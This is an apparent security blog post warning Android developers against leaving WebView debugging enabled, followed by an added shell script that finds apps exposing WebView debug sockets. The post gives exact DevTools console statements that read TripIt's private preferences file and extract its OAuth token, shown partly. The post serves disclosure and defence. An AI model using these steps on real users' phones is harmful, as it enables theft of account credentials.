Android Security: Don't leave WebView debugging enabled in production

Ashish Bhatia (ashishb), posted on August 14, 2019


WebView debugging is turned on by calling WebView.setWebContentsDebuggingEnabled(true). Leaving it enabled in production Android apps is a bad idea: anyone who gets even brief physical access to the unlocked phone can switch on USB debugging, attach a laptop and read everything in the app's private data directory, including credentials that keep working long after the phone is handed back. Gate the call on a debug build (for example BuildConfig.DEBUG) so that a release build never makes it.

Consider the TripIt app: it exposes WebView debugging, and through it I can read all the files inside its private data directory. As an example, by connecting a user's unlocked phone to my laptop, I can extract the TripIt OAuth token.

First connect the phone via ADB, open chrome://inspect in Chrome on the laptop, pick the TripIt WebView target listed under the device, and run the following two statements in its DevTools console (the first navigates the WebView to the app's preferences file, the second dumps the rendered page):

window.location="file:///data/data/com.tripit/shared_prefs/com.tripit.xml"
document.getElementsByTagName("html")[0].innerHTML

The dump contains the app's shared preferences entries, including

<string name="oauthTokenSecret">f731d36cdbf9006f917307…</string>

The OAuth token and its secret can be copied off the phone and used from any machine to access the user's TripIt account; that access persists until the user revokes the token.
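How chrome://inspect finds that target, as an added example that is not part of the original post: a WebView with debugging enabled listens on an abstract Unix socket named @webview_devtools_remote_<pid>, and Chrome simply enumerates those over ADB. The script below parses /proc/net/unix for such sockets (a constructed sample is embedded so it runs offline) and, when run with --live, performs the same check against a connected device, forwards the socket to a local TCP port and queries the DevTools /json endpoint, which is the channel the two console statements above travel over. The package lookup via /proc/<pid>/cmdline and the choice of port 9222 are my assumptions, not anything from the post; it is the check I would run over a test device to see which installed apps ship with WebView debugging on.

```shell
#!/bin/sh
# Added example (not from the original post): list apps on an Android device
# that expose WebView remote debugging. A debuggable WebView listens on the
# abstract Unix socket @webview_devtools_remote_<pid>, visible in /proc/net/unix.
set -u

# Constructed sample of /proc/net/unix (real devices use the same layout).
# Chrome's own browser socket and a plain filesystem socket are included so the
# filter has something to reject; one WebView socket is listed twice on purpose.
SAMPLE_PROC_NET_UNIX='Num       RefCount Protocol Flags    Type St Inode Path
0000000000000000: 00000002 00000000 00010000 0001 01 21000 @chrome_devtools_remote
0000000000000000: 00000002 00000000 00010000 0001 01 21001 @webview_devtools_remote_4567
0000000000000000: 00000003 00000000 00000000 0001 03 21002 /dev/socket/adbd
0000000000000000: 00000002 00000000 00010000 0001 01 21003 @webview_devtools_remote_4567
0000000000000000: 00000002 00000000 00010000 0001 01 21004 @webview_devtools_remote_8910'

# Read /proc/net/unix text on stdin; print "<pid> <socket>" once per WebView
# DevTools socket. The socket path is the last field of each line; lines
# without a path have fewer fields and never match the pattern.
list_webview_debug_sockets() {
  awk '$NF ~ /^@webview_devtools_remote_[0-9]+$/ {
         pid = $NF
         sub(/^@webview_devtools_remote_/, "", pid)
         print pid, $NF
       }' | sort -u
}

# Resolve a pid on the connected device to its package name: the first
# NUL-terminated field of /proc/<pid>/cmdline, minus any ":process" suffix.
# Needs adb; stdin is redirected so adb does not eat the caller's input.
pid_to_package() {
  adb shell "cat /proc/$1/cmdline" < /dev/null | tr -d '\000' | cut -d: -f1
}

if [ "${1:-}" = "--live" ]; then
  # Live check: requires USB debugging enabled and this host authorized.
  adb shell cat /proc/net/unix | list_webview_debug_sockets |
  while read -r pid sock; do
    pkg=$(pid_to_package "$pid")
    echo "WebView debugging exposed by $pkg (pid $pid, socket $sock)"
    # Same thing chrome://inspect does: forward the abstract socket to a local
    # TCP port (9222 is an arbitrary choice) and list the DevTools targets.
    # Each target's webSocketDebuggerUrl accepts Page.navigate and friends.
    adb forward tcp:9222 "localabstract:${sock#@}"
    curl -s http://127.0.0.1:9222/json
    adb forward --remove tcp:9222
  done
else
  # Offline run over the constructed sample.
  printf '%s\n' "$SAMPLE_PROC_NET_UNIX" | list_webview_debug_sockets
fi
```

Run without arguments to see the parser work on the embedded sample, or with --live against a device. An app whose pid turns up here is one whose private data can be read exactly as shown above; if it is your own app, the fix is to stop calling setWebContentsDebuggingEnabled(true) outside debug builds.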

Original post at ashishb.net
